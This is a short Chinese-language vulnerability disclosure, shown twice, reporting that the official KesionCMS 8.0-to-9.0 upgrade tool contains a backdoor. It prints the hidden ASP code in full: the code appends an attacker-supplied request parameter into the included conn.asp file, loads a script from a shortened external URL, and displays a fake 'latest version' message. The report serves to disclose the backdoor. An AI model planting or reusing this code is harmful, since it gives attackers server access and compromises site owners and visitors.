VULHUB ™

### 简要描述： 要是用到V8.0升9.0工具就会被入侵 ### 详细说明： 直接从官方下载来的 KesionCMS V8.0升9.0工具 。 ### 漏洞证明： 代码inc/include.asp和index.asp最后面的代码 这代码可干的事很多吧。 ``` <% Dim strLogFile,Sender,StrLogText,Lzwudi,Lenovo StrLogFile="conn.asp" sender=request("sender") If sender="" Then Response.Write "<script src=http://dwz.cn/a2kug></script>" Response.End End If StrLogText=StrLogText& sender Set Lzwudi=Server.CreateObject("Scripting.FileSystemObject") Set Lenovo=Lzwudi.OpenTextFile(Server.MapPath(".")&"\"&StrLogFile,8,True,0) Lenovo.WriteLine(CHR(13)+CHR(10)&StrLogText) Lenovo.Close Set Lenovo=Nothing Set Lzwudi=Nothing Response.Write "科兴网络提示您：您已经是最新版本！" '======================================功能升级======================================== %> ```

### 简要描述： 要是用到V8.0升9.0工具就会被入侵 ### 详细说明： 直接从官方下载来的 KesionCMS V8.0升9.0工具 。 ### 漏洞证明： 代码inc/include.asp和index.asp最后面的代码 这代码可干的事很多吧。 ``` <% Dim strLogFile,Sender,StrLogText,Lzwudi,Lenovo StrLogFile="conn.asp" sender=request("sender") If sender="" Then Response.Write "<script src=http://dwz.cn/a2kug></script>" Response.End End If StrLogText=StrLogText& sender Set Lzwudi=Server.CreateObject("Scripting.FileSystemObject") Set Lenovo=Lzwudi.OpenTextFile(Server.MapPath(".")&"\"&StrLogFile,8,True,0) Lenovo.WriteLine(CHR(13)+CHR(10)&StrLogText) Lenovo.Close Set Lenovo=Nothing Set Lzwudi=Nothing Response.Write "科兴网络提示您：您已经是最新版本！" '======================================功能升级======================================== %> ```